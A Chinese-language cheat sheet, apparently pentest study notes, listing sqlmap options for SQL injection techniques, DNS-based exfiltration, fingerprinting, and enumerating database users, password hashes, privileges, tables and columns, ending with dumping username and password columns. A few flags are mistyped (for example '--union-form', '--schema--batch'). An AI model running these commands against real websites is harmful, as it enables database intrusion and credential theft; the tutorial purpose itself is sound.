sqlmap --technique 参数用来设置具体SQL注入技术
B: Boolean-based blind 基于布尔的忙逐步
E:Error-based 报错注入
U:Union query-based Union查询注入
S:Stacked queries 堆叠注入
T:Time-based blind 基于时间的盲注
Q:lnline queries 内联查询注入
例如:
sqlmap -u “存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。
1、sqlmap设置时间盲注延迟时间
例如: sqlmap -u "存在注入点的URL" --time-sec 3 --current-db
2、sqlmap设置UNION字段数
sqlmap -u “存在注入的URL" --union-cols 12-18 --current-db
3、sqlmap设置union查询表
sqlmap -u “存在注入的URL" --technique u --union-form users --current-db -v3
4、sqlmap设置DNS攻击
定义:通过设置DNS流量来突破限制 --dns-domain "dns服务器" 需要用户自身具有一个开放53端口的DNS服务器,通过DNS流量来获得web应用程序中数据内容。
5、sqlmap设置二次注入
sqlmap中可以设置二次注入的结果页面
sqlmap -u "存在注入的URL" --second-order
6、sqlmap识别指纹
sqlmap -u "存在注入的URL" --fingerprint -f
探测目标指纹信息(--fingerprint -f)
7、sqlmap检索DBMS Banner
获取后端数据库Banner信息 --banner 或者 -b
8、sqlmap检索DBMS当前用户
获取DBMS当前用户 --current-user
9、sqlmap检索DBMS当前数据库
获取当前数据库名 --current-db
10、sqlmap检索DBMS当前 主机名
--hostname
11、sqlmap探测当前用户DBA
--is-dba 探测当前用户是否是数据库管理员
12、sqlmap 枚举DBMS用户名
--user 获取DBMS所有用户
13、sqlmap枚举DBMS的用户名密码
--password 获取用户名密码
mysql -h IP地址 -u root -p #MySQL数据库登录
14、sqlmap枚举DBMS权限
--privileges--role(角色)
例如:sqlmap -u "存在注入的URL" --technique -u -v3 --batch --privileges
15、sqlmap列举数据库名
--dbs 列举数据库名称
16、sqlmap枚举数据库表
--tables 枚举表名 --> 制定具体数据库 -D 数据库名
--exclude-sysdbs
例如:(1)sqlmap -u "存在注入的URL" -D 数据库名 --tables
(2)sqlmap -u "存在注入的URL" --tables --exclude-sysdbs
17、sqlmap枚举数据表列
--columns -D 指定数据库 -T 指定数据表 -C 指定具体字段
例如:sqlmap -u "存在注入的URL地址" -D 数据库名 -T 用户名 --columns
18、sqlmap枚举数据值
--dump
例如:sqlmap -u "存在注入的URL地址" -D 数据库名 -T 表名 -C “username,password" --dump
19、sqlmap枚举schema信息
定义:用户可以使用此开关--schema检索DBMS模式。模式列表将所有的数据库、表和列,以及它们各自的类型。与--exclude-sysdb结合使用时,只会检索和显示包含非系统数据库的模式的一部分
例如:sqlmap -u "存在注入的URL地址" --schema--batch --exclude-sysdbs
20、sqlmap检索数据表的数量
如果用户只想知道表中的条目数,则可以使用此开关。
--count
例如:sqlmap -u "存在注入的URL地址" --count -D testdb